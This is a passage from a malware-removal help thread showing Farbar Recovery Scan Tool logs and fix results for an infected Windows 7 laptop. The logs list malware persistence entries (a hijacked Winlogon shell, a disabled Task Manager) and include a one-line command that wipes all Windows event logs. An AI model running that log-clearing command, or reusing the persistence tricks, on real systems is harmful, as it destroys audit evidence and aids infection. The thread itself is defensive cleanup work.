FirewallRules: [{79C5FF69-9C6C-4795-BBBF-8058548DF184}] => (Allow) C:\Program Files (x86)\Vuze\Azureus.exe (Azureus Software, Inc. -> Azureus Software, Inc)
FirewallRules: [TCP Query User{C22CAF2C-8CE3-4B0E-B3E7-5A8C676B5F8E}C:\program files (x86)\java\jre1.8.0_73\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_73\bin\javaw.exe No File
FirewallRules: [UDP Query User{DCFA2E94-61CF-4517-A82F-AA51C00BB916}C:\program files (x86)\java\jre1.8.0_73\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_73\bin\javaw.exe No File
FirewallRules: [{9B9900F7-F341-4F67-A222-BA5ADB3D415F}] => (Block) C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WShelper.exe No File
FirewallRules: [{C27B1110-1C16-4970-BA34-D7815EC04CD1}] => (Allow) c:\program files (x86)\opera\63.0.3368.107\opera.exe (Opera Software AS -> Opera Software)
FirewallRules: [{5F4157A8-99BC-42D7-9E0B-83BC577FB74E}] => (Allow) c:\program files (x86)\opera\64.0.3417.92\opera.exe (Opera Software AS -> Opera Software)
FirewallRules: [{E312F188-3203-4E00-8BD8-6B9B54F77B8A}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
 
==================== Restore Points =========================
 
16-11-2019 17:22:21 Removed Betternet for Windows 5.3.0.433
18-11-2019 19:29:54 Removed Nero 8. Available with Windows Installer version 1.2 and later.
 
==================== Faulty Device Manager Devices ============
 
 
==================== Event log errors: ========================
 
Application errors:
==================
 
System errors:
=============
Error: (11/19/2019 01:51:48 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Windows Update service hung on starting.
 
Error: (11/19/2019 01:45:26 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Freemake Improver service failed to start due to the following error: 
The service did not respond to the start or control request in a timely fashion.
 
Error: (11/19/2019 01:45:26 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Freemake Improver service to connect.
 
 
CodeIntegrity:
===================================
 
Date: 2019-11-19 01:49:05.098
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
==================== Memory info =========================== 
 
BIOS: FUJITSU // Phoenix Technologies Ltd. Version 1.08 10/02/2012
Motherboard: FUJITSU FJNBB29
Processor: Intel® Pentium® CPU B960 @ 2.20GHz
Percentage of memory in use: 91%
Total physical RAM: 3447.63 MB
Available physical RAM: 282.29 MB
Total Virtual: 6893.39 MB
Available Virtual: 2743.88 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:97.56 GB) (Free:38.73 GB) NTFS
Drive d: (New Volume) (Fixed) (Total:368.1 GB) (Free:205.66 GB) NTFS
 
\\?\Volume{da4eedc3-7be1-11e2-8ac3-806e6f6e6963}\ () (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS
 
==================== MBR & Partition Table ====================
 
==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: EB90EB90)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=97.6 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=368.1 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt =======================

  • 0

#9
RKinner

RKinner

    Malware Expert

  • Expert
  • 24,598 posts
  • MVP

One more fixlist:

 

Attached File  fixlist.txt   4.08KB   404 downloads

 

See if you can get Avast to come up.  If it does try and schedule a boot-time scan:

 

Click on Protection, then on Antivirus, then on Other Scans then on Boot-time Scan.  Click on Install Special Definitions.  Click on Run on Next PC Reboot.

  Reboot and let it run a scan.  It may take hours.
Once it finishes it should load windows.   Mute your speakers so it doesn't wake you up when Windows boots.

When you reboot you will see the scan start.  It will tell you where it saves its log.  Usually it's C:\ProgramData\AVAST Software\Avast\report\aswBoot.txt but it might change so verify the location.   This is a hidden location so you will need to tell Windows to let you see it:

http://www.howtogeek...-windows-vista/

Copy and paste the text from the log to a Reply when done.

 


  • 0

#10
vladana_91

vladana_91

    Member

  • Topic Starter
  • Member
  • PipPip
  • 18 posts

Done the fixlist but still can't get Avast to start...


  • 0

Advertisements


#11
RKinner

RKinner

    Malware Expert

  • Expert
  • 24,598 posts
  • MVP

Can I see a new FRST scan?


  • 0

#12
vladana_91

vladana_91

    Member

  • Topic Starter
  • Member
  • PipPip
  • 18 posts

Scans are below (sorry for bothering you so much)...

 

Copy of Fixlog.txt:

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 14-11-2019
Ran by Vladana (19-11-2019 14:43:11) Run:5
Running from C:\Users\Vladana\Desktop
Loaded Profiles: Vladana (Available Profiles: Vladana)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
HKLM\...\Winlogon: [Shell] explorer.exe,d.exe
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Policies\system: [DisableTaskMgr] 1
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\MountPoints2: {da4eedc7-7be1-11e2-8ac3-806e6f6e6963} - E:\start.exe
Startup: C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZenMate.bat [2019-11-16] () [File not signed]
Task: {99C2A032-6D1C-441F-87FE-DA0735A1B827} - System32\Tasks\{6243CAD4-3DB1-45D4-933D-254A23B4CA85} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\RelevantKnowledge\rlvknlg.exe" -c -bootremove -uninst:RelevantKnowledge
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{86508D42-E5D7-4D10-9C6F-D427AEEB85B5}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.34.11\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{A804CF1A-91E5-4F0C-9E8C-DB39E74056DD}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.23\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{EA724FD3-844D-43A9-A8C9-A5BC35FC20E4}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.17\psuser_64.dll => No File
MSCONFIG\startupfolder: C:^Users^Vladana^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^ZenMate.bat => C:\Windows\pss\ZenMate.bat.Startup
HKLM-x32\...\Run: [ProductUpdater] => C:\Program Files (x86)\Common Files\Freemake Shared\ProductUpdater\ProductUpdater.exe [240512 2019-10-25] (Mixbyte Inc -> )
CMD: FOR /F "usebackq delims==" %i IN (`wevtutil el`) DO wevtutil cl "%i"
Reboot:
 
 
*****************
 
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell => value restored successfully
"HKU\S-1-5-21-7682389-3612777877-391866582-1000\Software\Microsoft\Windows\CurrentVersion\Policies\system\\DisableTaskMgr" => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{da4eedc7-7be1-11e2-8ac3-806e6f6e6963} => removed successfully
C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZenMate.bat => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{99C2A032-6D1C-441F-87FE-DA0735A1B827}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{99C2A032-6D1C-441F-87FE-DA0735A1B827}" => removed successfully
C:\Windows\System32\Tasks\{6243CAD4-3DB1-45D4-933D-254A23B4CA85} => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{6243CAD4-3DB1-45D4-933D-254A23B4CA85}" => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{86508D42-E5D7-4D10-9C6F-D427AEEB85B5} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{A804CF1A-91E5-4F0C-9E8C-DB39E74056DD} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{EA724FD3-844D-43A9-A8C9-A5BC35FC20E4} => removed successfully
HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^Users^Vladana^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^ZenMate.bat => removed successfully
C:\Windows\pss\ZenMate.bat.Startup => moved successfully
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ProductUpdater" => removed successfully
 
========= FOR /F "usebackq delims==" %i IN (`wevtutil el`) DO wevtutil cl "%i" =========
 
 
========= End of CMD: =========
 
 
 
The system needed a reboot.
 
==== End of Fixlog 14:43:28 ====
 
 
Copy of FRST.txt:
 
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 14-11-2019
Ran by Vladana (administrator) on VLADANA-PC (FUJITSU LIFEBOOK AH512) (19-11-2019 15:28:30)
Running from C:\Users\Vladana\Desktop
Loaded Profiles: Vladana (Available Profiles: Vladana)
Platform: Windows 7 Ultimate (X64) Language: English (United States)
Internet Explorer Version 9 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Adobe Inc. -> Adobe Systems) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApntEx.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Hidfind.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files (x86)\Fujitsu\Fujitsu Hotkey Utility\IndicatorUty.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\Application Panel\BtnHnd.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\Application Panel\QuickTouch.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\FUJ02E3\FUJ02E3.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\FUJ02E3\FUJ02E3.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\PSUtility\PSUService.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\PSUtility\TrayManager.exe
(FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNAutoCon.exe
(FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNetDm.exe
(FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNService.exe
(FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNTray.exe
(Google Inc -> Google Inc.) C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
(Intel Corporation - Mobile Wireless Group -> Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\btplayerctrl.exe
(Intel Corporation - Mobile Wireless Group -> Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
(Intel Corporation - Mobile Wireless Group -> Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\mediasrv.exe
(Intel Corporation - Mobile Wireless Group -> Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation-Mobile Wireless Group -> Intel Corporation) C:\Program Files\Intel\BluetoothHS\BTHSAmpPalService.exe
(Intel Corporation-Mobile Wireless Group -> Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Intel Corporation-Mobile Wireless Group -> Intel® Corporation) C:\Program Files\Intel\BluetoothHS\BTHSSecurityMgr.exe
(Intel Corporation-Mobile Wireless Group -> Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Intel Corporation-Mobile Wireless Group -> Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(Intel® Upgrade Service -> Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(iSkySoft) [File not signed] C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\ISHelper.exe
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\microsoft shared\VS7DEBUG\mdm.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Microsoft Windows Hardware Compatibility Publisher -> DTS, Inc) C:\Program Files\Realtek\Audio\HDA\DTSU2PAuSrv64.exe
(Opera Software AS -> Opera Software) C:\Program Files (x86)\Opera\launcher.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Popcorn Time) [File not signed] C:\Program Files (x86)\Popcorn Time\Updater.exe
(Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft) C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe
(WONBO TECHNOLOGY Co.,LIMITED -> ) C:\Program Files (x86)\KeepVid\KeepVid Pro\KeepVidProUpdateHelper.exe
 
==================== Registry (Whitelisted) ===================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13374568 2011-12-13] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_DTS] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2277992 2011-11-15] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [589176 2011-12-20] (Alps Electric Co., LTD. -> Alps Electric Co., Ltd.)
HKLM\...\Run: [BTMTrayAgent] => C:\Program Files (x86)\Intel\Bluetooth\btmshell.dll [11406608 2011-12-19] (Intel Corporation - Mobile Wireless Group -> Intel Corporation)
HKLM\...\Run: [LoadFUJ02E3] => C:\Program Files\Fujitsu\FUJ02E3\fuj02e3.exe [76104 2011-11-23] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM\...\Run: [PSUTility] => C:\Program Files\Fujitsu\PSUtility\TrayManager.exe [169368 2012-06-29] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM\...\Run: [LoadFujitsuQuickTouch] => C:\Program Files\Fujitsu\Application Panel\QuickTouch.exe [158024 2011-09-30] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM\...\Run: [LoadBtnHnd] => C:\Program Files\Fujitsu\Application Panel\BtnHnd.exe [23368 2011-09-30] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvLaunch.exe [268680 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
HKLM-x32\...\Run: [IndicatorUtility] => C:\Program Files (x86)\Fujitsu\Fujitsu Hotkey Utility\IndicatorUty.exe [48752 2010-09-29] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [31016 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
HKLM-x32\...\Run: [DivXMediaServer] => C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe [1058512 2018-12-18] (DivX, LLC. -> DivX, LLC)
HKLM-x32\...\Run: [NSU_agent] => C:\Program Files (x86)\Nokia\Nokia Software Updater\nsu3ui_agent.exe [190768 2012-02-28] (Nokia -> )
HKLM-x32\...\Run: [Aimersoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe [2138272 2016-10-08] (Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft)
HKLM-x32\...\Run: [KeepVidProUpdateHelper.exe] => C:\Program Files (x86)\KeepVid\KeepVid Pro\KeepVidProUpdateHelper.exe [33912 2017-08-15] (WONBO TECHNOLOGY Co.,LIMITED -> )
HKLM-x32\...\Run: [iSkysoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\ISHelper.exe [2066432 2014-10-31] (iSkySoft) [File not signed]
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [644552 2019-07-04] (Oracle America, Inc. -> Oracle Corporation)
HKLM-x32\...\Run: [NBKeyScan] => "C:\Program Files (x86)\Nero\Nero8\Nero BackItUp\NBKeyScan.exe"
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Run: [Google Update] => C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.342\GoogleUpdateCore.exe [218920 2019-11-05] (Google Inc -> Google LLC)
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] => "C:\Program Files (x86)\Common Files\Nero\Lib\NMBgMonitor.exe"
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Run: [CyberGhost] => "C:\Program Files\CyberGhost 6\CyberGhost.exe" /autostart /min
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\RunOnce: [Uninstall C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\amd64] => C:\Windows\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\amd64"
HKU\S-1-5-21-7682389-3612777877-391866582-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\scrnsave.scr [11264 2009-07-14] (Microsoft Windows -> Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\78.0.3904.97\Installer\chrmstp.exe [2019-11-08] (Google LLC -> Google LLC)
HKLM\Software\...\Authentication\Credential Providers: [{F8A0B131-5F68-486c-8040-7E8FC3C85BB6}] -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDCREDPROV.DLL [2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Startup: C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk [2016-07-06]
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files (x86)\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation -> Microsoft Corporation)
GroupPolicy: Restriction - Chrome <==== ATTENTION
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
 
==================== Scheduled Tasks (Whitelisted) ============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {100579BF-7099-45D9-81DA-9283171425EF} - System32\Tasks\Opera scheduled Autoupdate 1433936833 => c:\program files (x86)\opera\launcher.exe [1534488 2019-11-05] (Opera Software AS -> Opera Software)
Task: {1BA80324-DEDD-4A84-B6B2-CA83338FEFC4} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe
Task: {250DFF6E-ACA0-469C-AE95-348B168F5625} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_293_Plugin.exe [1457720 2019-11-13] (Adobe Inc. -> Adobe)
Task: {31E39139-7D23-449D-BCED-F7C976E90C09} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1240656 2019-09-10] (Adobe Inc. -> Adobe Systems)
Task: {3647BA06-A942-4A3A-A231-81D956C0A720} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-7682389-3612777877-391866582-1000Core => C:\Users\Vladana\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-29] (Google Inc -> Google Inc.)
Task: {3CDCC095-85A8-4F47-A3FD-E5901E10F3FF} - System32\Tasks\RealDownloaderDownloaderScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\recordingmanager.exe [369752 2014-10-26] (RealNetworks, Inc. -> RealNetworks, Inc.)
Task: {417C02B1-A8B8-4232-9ECA-7B637FC59D88} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-7682389-3612777877-391866582-1000UA => C:\Users\Vladana\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-29] (Google Inc -> Google Inc.)
Task: {44030493-B508-4C9F-AC24-87A95DD4F70E} - System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [147016 2014-10-26] (RealNetworks, Inc. -> RealNetworks, Inc.)
Task: {566F62E7-1E7A-4160-9E8D-8AD1BF772E07} - System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [141312 2014-10-30] (RealNetworks, Inc.) [File not signed]
Task: {64B1DDAF-9698-4A74-994F-0A07F4D7B428} - System32\Tasks\{EF41326F-22E8-4DCF-A020-C6061802D389} => C:\Windows\system32\pcalua.exe -a C:\Users\Vladana\Desktop\avast_secureline_setup.exe -d C:\Users\Vladana\Desktop
Task: {7795D282-1AC8-4061-8740-20E3A1600B28} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [3933576 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
Task: {7EF6B035-B47A-4A54-AC7B-879BC80BDD17} - System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [141312 2014-10-30] (RealNetworks, Inc.) [File not signed]
Task: {82855C30-C4B7-4A15-8981-4489BC782605} - System32\Tasks\DivXUpdate => C:\Program Files (x86)\Common Files\DivX Shared\DivX Update\DivXUpdate.exe [68568 2017-08-02] (DivX, LLC -> DivX, LLC)
Task: {88983266-6574-4D42-9429-D9F16127D4A3} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2019-11-13] (Adobe Inc. -> Adobe)
Task: {8D71D9D7-DCCC-4240-BD4F-C4CA801119C7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-09-06] (Google Inc -> Google Inc.)
Task: {9E09A37F-ED36-420C-A03C-DE3C2082D6BE} - System32\Tasks\{375818AB-9982-4CB0-BF65-E9B77DBF0F5C} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Car Thief 6 Full\Uninstall.exe" -c "C:\Program Files (x86)\Car Thief 6 Full\install.log"
Task: {A13BDE9B-63C9-405F-A251-35FF14182E3A} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe [1873288 2019-09-18] (AVAST Software s.r.o. -> AVAST Software)
Task: {B7E6DE52-C933-4EC4-805D-975375A0B866} - System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [147016 2014-10-26] (RealNetworks, Inc. -> RealNetworks, Inc.)
Task: {C3E6B74D-A015-41CB-880A-351C9A99C7A1} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-09-06] (Google Inc -> Google Inc.)
Task: {CFBA6569-6A55-4FC1-A592-F5F587B9D002} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_293_pepper.exe [1453112 2019-11-13] (Adobe Inc. -> Adobe)
Task: {D3B04CF0-75EA-4648-ACB9-9595936714D9} - System32\Tasks\RealDownloader Update Check => C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe [560192 2014-10-29] (RealNetworks, Inc. -> )
Task: {F41616F1-BAE7-4545-B894-B26DB5462DA7} - System32\Tasks\SafeZone scheduled Autoupdate 1458718670 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe
Task: {F99782F5-00F3-46F3-B278-C98C01F39A08} - System32\Tasks\Microsoft\Windows Live\SOXE\Extractor Definitions Update Task => {3519154C-227E-47F3-9CC9-12C3F05817F1}
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Winsock: Catalog5 08 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [145648 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5 09 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [145648 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5-x64 08 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [171760 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5-x64 09 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [171760 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{0C2497A5-01F6-4BCC-9CA4-707802C9870D}: [DhcpNameServer] 10.0.0.1
Tcpip\..\Interfaces\{935B787B-988D-48CA-B7C2-9CD4F281E961}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{E0977D5E-E20A-454E-B20E-ED97A614D189}: [DhcpNameServer] 192.168.1.1
 
Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com
HKU\S-1-5-21-7682389-3612777877-391866582-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp
BHO: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin64.dll [2014-10-26] (RealNetworks, Inc. -> RealDownloader)
